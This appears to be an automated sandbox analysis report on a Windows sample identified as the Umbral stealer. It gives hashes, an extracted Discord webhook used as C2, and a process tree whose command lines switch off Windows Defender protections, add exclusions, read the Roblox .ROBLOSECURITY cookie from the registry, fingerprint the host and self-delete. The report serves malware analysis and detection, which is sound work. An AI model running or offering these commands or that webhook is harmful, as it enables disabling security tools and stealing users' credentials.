Overview

overview

10

Static

static

3

331faea175...d8.exe

windows7-x64

10

331faea175...d8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    13-01-2025 02:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe

  • Size

    128KB

  • MD5

    4c8044c83f60465eae3cc16d7c858085

  • SHA1

    bc837ba36a8f244283483210215a11607f05fb63

  • SHA256

    331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8

  • SHA512

    f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432

  • SSDEEP

    3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe
    "C:\Users\Admin\AppData\Local\Temp\331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
      "C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1904
    • C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\resemble.py
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\resemble.py"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1960
    • C:\Users\Admin\AppData\Local\Temp\MoonHub.exe
      "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"
        3⤵
        • Views/modifies file attributes
        PID:2512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2576
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:848
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:1668
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2188

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\MoonHub.exe
        Filesize

        231KB

        MD5

        f70b5e56a09af292d4e909c547f9c8c0

        SHA1

        577883bdbe8dc9582e15e7a1212b1fe432bafce3

        SHA256

        8fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de

        SHA512

        e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\resemble.py
        Filesize

        27KB

        MD5

        23f1fabaef532d89fcb6d5bb14a36ef3

        SHA1

        679a82ed172d49f298bf07b6fa0de9b6c2ce0046

        SHA256

        e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51

        SHA512

        96e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
        Filesize

        3KB

        MD5

        1208d06db9ac19a4d7fbee4b358280b9

        SHA1

        0ecb7afcc480d29206e35eb61784ac887e64a422

        SHA256

        7e88f2b3574e097b2d4ca81685f7932dc64233f3fd5422ec5e0f6c0480a5944b

        SHA512

        6016e64c5fe01a754205e954ca14434845f14edbf247f76560365f261d60934ebeaa34ee9500c10c86d387b207fb0c5e752174f8b475f1dd80ece740334b3045

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        b3db901f68a98cea5538af4fd9dfc379

        SHA1

        97ede22318e0a8790c840e3ccbee8dd4bf8e2e1c

        SHA256

        17684924582a2c1b9767d881ecf1821877f27e7bf1681d5a843c20d1e8c99597

        SHA512

        15675d68a7c17abd79d737932b723bedc19673459da78dd021441a9f98cf2480fde2ed3673b62e8602c6e6e38202bd60eaad5e9df6af69bd7e99be1d1f034fd5

        Download Submit

      • \Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
        Filesize

        45KB

        MD5

        8c7d2f0a936dbe6d0899d40171ffb668

        SHA1

        0b22fcd904f3b0fa2555a32a2635423668fc4616

        SHA256

        85f5f5acb54c30efd4f84c0f11c834b7dab98c5bb7357bddcd29fbe5babc4db6

        SHA512

        463a48ec2752fd002e82dfe555abd03fc666a523da99e0e848788eeff6f98d06d36a360cfd7ad70d342bb4c90a49131a3428f1404d17e04a7fe5a1022c1faa65

        Download Submit

      • memory/848-63-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

        Download

      • memory/848-62-0x000000001B580000-0x000000001B862000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1384-28-0x000000001B650000-0x000000001B932000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1384-29-0x0000000002050000-0x0000000002058000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1720-16-0x000007FEF52A0000-0x000007FEF5C8C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/1720-0-0x000007FEF52A3000-0x000007FEF52A4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1720-1-0x0000000000B10000-0x0000000000B36000-memory.dmp

        Filesize

        152KB

        Download

      • memory/1900-22-0x00000000022C0000-0x00000000022C8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1900-21-0x000000001B540000-0x000000001B822000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1904-13-0x000000013F990000-0x000000013F9A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1952-15-0x0000000000BD0000-0x0000000000C10000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2732-50-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2732-49-0x000000001B6A0000-0x000000001B982000-memory.dmp

        Filesize

        2.9MB

        Download